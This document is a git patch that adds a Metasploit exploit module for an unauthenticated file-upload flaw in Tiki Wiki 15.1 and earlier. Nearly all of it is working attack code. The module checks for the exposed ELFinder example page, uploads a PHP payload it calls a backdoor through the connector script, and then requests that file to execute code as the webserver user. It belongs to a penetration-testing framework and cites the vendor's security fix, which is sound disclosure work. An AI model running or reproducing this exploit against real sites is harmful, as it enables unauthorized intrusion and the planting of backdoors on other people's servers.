From e79c3ba7c0de696304040dd746dc466af952bee1 Mon Sep 17 00:00:00 2001 From: Mehmet Ince Date: Mon, 11 Jul 2016 22:44:07 +0300 Subject: [PATCH] Tiki Wiki unauth rce --- .../unix/webapp/tikiwiki_upload_exec.rb | 93 +++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 modules/exploits/unix/webapp/tikiwiki_upload_exec.rb diff --git a/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb b/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb new file mode 100644 index 0000000000..94562b3878 --- /dev/null +++ b/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb @@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Tiki Wiki Unauthenticated File Upload Vulnerability', + 'Description' => %q{ + This module exploits a file upload vulnerability in Tiki Wiki <= 15.1 + which could be abused to allow unauthenticated users to execute arbitrary code + under the context of the webserver user. + + The issue comes with one of the 3rd party components. Name of that components is + ELFinder -version 2.0-. This components comes with default example page which + demonstrates file operations such as upload, remove, rename, create directory etc. + Default configuration does not force validations such as file extension, content-type etc. + Thus, unauthenticated user can upload PHP file. + + The exploit has been tested on Debian 8.x 64bit and Tiki Wiki 15.1. + }, + 'Author' => + [ + 'Mehmet Ince ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability' ], + [ 'URL', 'https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Payload' => + { + 'DisableNops' => true, + }, + 'Targets' => [ ['Automatic', {}] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jul 11 2016' + )) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Installed path of Tiki Wiki", "/tiki/"]) + ], self.class) + end + + def check + url = normalize_uri(target_uri.path, "vendor_extra/elfinder/elfinder.html") + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(url) + ) + if res and res.code == 200 + return Exploit::CheckCode::Appears + end + return Exploit::CheckCode::Safe + end + + def exploit + filename = rand_text_alpha(8 + rand(4)) + '.php' + data = Rex::MIME::Message.new + data.add_part('upload', nil, nil, 'form-data; name="cmd"') + data.add_part('l1_Lw', nil, nil, 'form-data; name="target"') + data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"") + print_status("Uploading backdoor file.") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "vendor_extra/elfinder/php/connector.minimal.php"), + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data.to_s + }) + if res and res.code == 200 + print_good("Backdoor successfully created.") + else + fail_with(Failure::Unknown, "#{peer} - Error on uploading file") + end + print_status("Trigging the exploit...") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "vendor_extra/elfinder/files/"+filename) + },5) + end +end